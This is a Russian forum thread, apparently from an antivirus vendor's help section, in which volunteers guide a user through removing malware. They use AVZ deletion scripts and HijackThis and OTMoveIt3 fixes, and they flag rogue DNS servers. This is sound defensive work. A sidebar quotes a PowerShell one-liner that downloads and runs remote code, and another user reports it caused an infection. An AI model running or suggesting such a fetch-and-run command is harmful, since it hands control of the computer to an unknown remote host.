Перейти к содержанию
Правила раздела

Вирус или что?

Sasha12128

От Sasha12128
в Помощь в удалении вирусов

 Share

Рекомендуемые сообщения

Sasha12128 Новичок

Sasha12128

Опубликовано
Опубликовано (изменено)

Вчера обнаружил при двойном клике на любом из разделов жёсткого диска c,d и т.д. после чего окно закрывалось, вот такое сообщение об ошибки:

post-8711-1236073461_thumb.jpg

Изменено пользователем Sasha12128
Ссылка на комментарий
Поделиться на другие сайты
akoK Ветеран

akoK

Опубликовано
Опубликовано

AVZ, меню "Файл - Выполнить скрипт" -- Скопировать ниже написанный скрипт-- Нажать кнопку "Запустить".

begin
ClearQuarantine;
SearchRootkit(true, true);
SetAVZGuardStatus(true);
SetServiceStart('msupdate', 4);
QuarantineFile('digeste.dll','');
QuarantineFile('F:\DOCUME~1\Bredlyy\LOCALS~1\Temp\init.exe','');
QuarantineFile('c:\windows\system32\..\svchost.exe','');
DeleteFile('c:\windows\system32\..\svchost.exe');
DeleteFile('F:\DOCUME~1\Bredlyy\LOCALS~1\Temp\init.exe');
DeleteFile('digeste.dll');
DeleteFile('C:\autorun.inf');
DeleteFile('D:\autorun.inf');
DeleteFile('E:\autorun.inf');
DeleteFile('F:\autorun.inf');
DeleteService('msupdate');
BC_ImportALL;
ExecuteRepair(8);
BC_Activate;
ExecuteSysClean;
RebootWindows(true);
end.

После выполнения скрипта компьютер перезагрузится.

 

begin
CreateQurantineArchive(GetAVZDirectory+'quarantine.zip');
end.

 

 

Полученный архив отправьте на newvirus<at>kaspersky.com (at=@) с указанием пароля: virus в теле письма

 

Скачайте RSIT или отсюда. Запустите, выберите проверку файлов за последние три месяца и нажмите продолжить. Должны открыться два отчета log.txt и info.txt. Прикрепите их к следующему сообщению. Если вы их закрыли, то логи по умолчанию сохраняются в одноименной папке (RSIT) в корне системного диска.

 

 

 

Повторите логи.

Ссылка на комментарий
Поделиться на другие сайты
FagotAdmin Постоялец

FagotAdmin

Опубликовано
Опубликовано
Вчера обнаружил при двойном клике на любом из разделов жёсткого диска c,d и т.д. после чего окно закрывалось, вот такое сообщение об ошибки:

Вирусня, возможно остатки, возможно Авторанер... Че делать? Сначала запишите на болванку AVZ 4 и сканер Dr. Web в безопасном режиме просканируйте систему с диска сначала AVZ 4 потом Dr. Web (сканеры запускать с болванки! ) после этого установите какую нить утилитку по очистке реестра и почистите реестр, благо такого софта в нэте полно. Думаю этот совет поможет Вам :)

Ссылка на комментарий
Поделиться на другие сайты
ТроПа Ветеран

ТроПа

Опубликовано
Опубликовано
Думаю этот совет поможет Вам

 

А вы видите что процесс лечения уже идёт или принципиально не читаете больше ничьи сообщения?

Ссылка на комментарий
Поделиться на другие сайты
akoK Ветеран

akoK

Опубликовано
Опубликовано (изменено)

FagotAdmin, я не сильно Вам мешаю своими рекомендациями проводить лечение?

 

ыыыы афтар жжет.

Изменено пользователем akoK
Ссылка на комментарий
Поделиться на другие сайты
akoK Ветеран

akoK

Опубликовано
Опубликовано

Помойка еще осталась.

 

Пофиксить в HijackThis следующие строчки

 	
F2 - REG:system.ini: Shell=c:\windows\explorer.exe
O2 - BHO: MyCentria Internet Mate v2.0 - {FFFC57DB-1DE3-4303-B24D-CEE6DCDD3D86} - C:\PROGRA~1\MYCENT~1\InfoBar\MYCENT~1.DLL
O9 - Extra button: (no name) - {8DAE90AD-4583-4977-9DD4-4360F7A45C74} - (no file)
O20 - Winlogon Notify: crypt - C:\WINDOWS\

 

Ваш провайдер?

85.255.114.72
org-name: UkrTeleGroup Ltd.
address: UkrTeleGroup Ltd.
address: Mechnikova 58/5 65029 Odessa

 

Если нет, то пофиксить в HijackThis

 
O17 - HKLM\System\CS8\Services\Tcpip\Parameters: NameServer = 85.255.114.72,85.255.112.212
O17 - HKLM\System\CS9\Services\Tcpip\Parameters: NameServer = 85.255.114.72,85.255.112.212
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: NameServer = 85.255.114.72,85.255.112.212

 

Скачайте OTMoveIt3 by OldTimer или с зеркала и сохраните на рабочий стол.

Запустите OTMoveIt3 (в ОС Windows Vista необходимо запускать через правую кн. мыши от имени администратора)

временно выключите антивирус, firewall и другое защитное программное обеспечение. Выделите и скопируйте текст ниже (Ctrl+C)

:Processes
explorer.exe

:Services

:Files
J:\autorun.exe
G:\autorun.exe
F:\Documents and Settings\Bredlyy\Local Settings\Temp\init.exe
C:\Program Files\MyCentria
C:\WINDOWS\system32\shell31.dll
C:\WINDOWS\A7E07C2B2220441587E3784D5814BC93.TMP
:Reg
[-HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{adcb423e-504b-11dd-a291-d36e9a8ae8dc}]
[-HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{b6acff2b-840a-11dd-a3a3-81c20484a636}]
[-HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{ec0f1bed-e33d-11dd-a4a5-aa80ea13728f}]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\crypt]
:Commands
[purity]
[emptytemp]
[start explorer]
[Reboot]

В OTMoveIt3 под панелью "Paste Instructions for Items to be Moved" (под желтой панелью) вставьте скопированный текст и нажмите кнопку "MoveIt!". Выделите (Ctrl+A) и скопируйте (Ctrl+C) текст из окна под панелью "Results" (правая зеленая панель) в следующее сообщение.

Прим: Если файлы и папки не могут быть перемещены немедленно и появиться запись <deleted on reboot>, потребуется перезагрузка. После перезагрузки откройте папку "C:\_OTMoveIt\MovedFiles", найдите последний .log файл (лог в формате mmddyyyy_hhmmss.log), откройте и скопируйте текст из него в следующее сообщение.

 

Скачайте Malwarebytes' Anti-Malware, установите, обновите базы, выберите "Perform Full Scan", нажмите "Scan", после сканирования - Ok - Show Results (показать результаты) - нажмите "Remove Selected" (удалить выделенные). Откройте лог и скопируйте в сообщение.

 

Bonjour - нужен?

 

А что за вирус был?

Вам прийдет ответ от виралаба, а не мне :)

Ссылка на комментарий
Поделиться на другие сайты
Sasha12128 Новичок

Sasha12128

Опубликовано
  • Автор
Опубликовано (изменено)

Пофиксил :)

 

Ваш провайдер?

85.255.114.72
org-name: UkrTeleGroup Ltd.
address: UkrTeleGroup Ltd.
address: Mechnikova 58/5 65029 Odessa

 

Не провайдер не мой, тоже пофиксил B)

 

Bonjour - нужен?

Нет не нужен, а как избавится?

03032009_215725.log

mbam_log_2009_03_03__22_53_13_.txt

Изменено пользователем Sasha12128
Ссылка на комментарий
Поделиться на другие сайты
akoK Ветеран

akoK

Опубликовано
Опубликовано

AVZ, меню "Файл - Выполнить скрипт" -- Скопировать ниже написанный скрипт-- Нажать кнопку "Запустить".

begin
SetAVZGuardStatus(True);
DeleteService('Bonjour Service');
DeleteFile('c:\program files\bonjour\mdnsresponder.exe');
DeleteFile('c:\program files\bonjour\mdnsNSP.dll');
BC_ImportAll;
ExecuteSysClean;
BC_Activate;
RebootWindows(true);
end.

После выполнения скрипта компьютер перезагрузится.

Ссылка на комментарий
Поделиться на другие сайты

Пожалуйста, войдите, чтобы комментировать

Вы сможете оставить комментарий после входа в



Войти
 Share
Перейти к списку тем

  • Похожий контент

    • San4s2034
      Вирус-майнер
      От San4s2034
      Недавно скачал Game of Thrones Genesis с torrent-game.net. Касперски указал, что сайту можно доверять и он проверен. По итогу через время заметил, что в valorant фпс стал заблоченным на 75 и поднимается вверх только если я двигаю мышкой или нажимаю что-то на клавиатуре. Очевидно, что словил майнер. Запустил быструю и полную проверку, результата не дало. Попробовал через защитник windows 11. Заметил, что прогресс доходит до ~70% и потом просто зависает. Запустился через безопасный режим, зашёл в защитник и вылезла ошибка(скриншот). Проверил реестр и групповые политики, ничего нет, все чисто. 

    • San4s2034
      Вирус-майнер
      От San4s2034
      Недавно скачал Game of Thrones Genesis с torrent-game.net. Касперски указал, что сайту можно доверять и он проверен. По итогу через время заметил, что в valorant фпс стал заблоченным на 75 и поднимается вверх только если я двигаю мышкой или нажимаю что-то на клавиатуре. Очевидно, что словил майнер. Запустил быструю и полную проверку, результата не дало. Попробовал через защитник windows 11. Заметил, что прогресс доходит до ~70% и потом просто зависает. Запустился через безопасный режим, зашёл в защитник и вылезла ошибка(скриншот). Проверил реестр и групповые политики, ничего нет, все чисто. 

    • fertune
      Вирус dialer.exe
      От fertune
      Когда открываешь диспетчер задач то сначала ЦП грузит на 100% а потом на 10% я посмотрел через dr.web cureit и увидел то что это майнер dialer.exe, смотрел в интернете как пофиксить но никакие способы не помогли(может быть я что то делал неправильно)
      можете помочь с проблемой? Еще я пробовал его фиксить удаляя его но он опять появлялся и грузил ЦП на все 100%.
       
    • Temikst
      Поймал какой-то вирус
      От Temikst
      Приветствую. Сын скачивал какую-то программу для игры, как итог словили какой-то вирус. Dr.web ничего не нашел. но обратил внимание что комп стал тупить, до этого не было так
      CollectionLog-2025.02.09-23.46.zip

       
      Даже браузер сильно тормозит. после открывание диспетчер задач сразу же лучше работает\
    • VanyeJ
      Вирус в PowerShell
      От VanyeJ
      Здравствуйте, при включении компьютера и окончательном входе в систему PowerShell пытается перекинуть на вредоносную ссылку. Касперский сразу же блокирует.

      Событие: Остановлен переход на сайт
      Пользователь: WIN-O4R3Q0UCBR5\User
      Тип пользователя: Инициатор
      Имя приложения: powershell.exe
      Путь к приложению: C:\Windows\System32\WindowsPowerShell\v1.0
      Компонент: Интернет-защита
      Описание результата: Запрещено
      Тип: Вредоносная ссылка
      Название: 
      Точность: Точно
      Степень угрозы: Высокая
      Тип объекта: Веб-страница
      Имя объекта: 1731762779-9803.jpeg
      Путь к объекту: 
      Причина: Облачная защита

      Активировал Windows через cmd после этого появилось (powershell iex (irm 'activated.run/key')) команда после которой вирус появился.
      CollectionLog-2025.02.08-15.48.zip
×
×
  • Создать...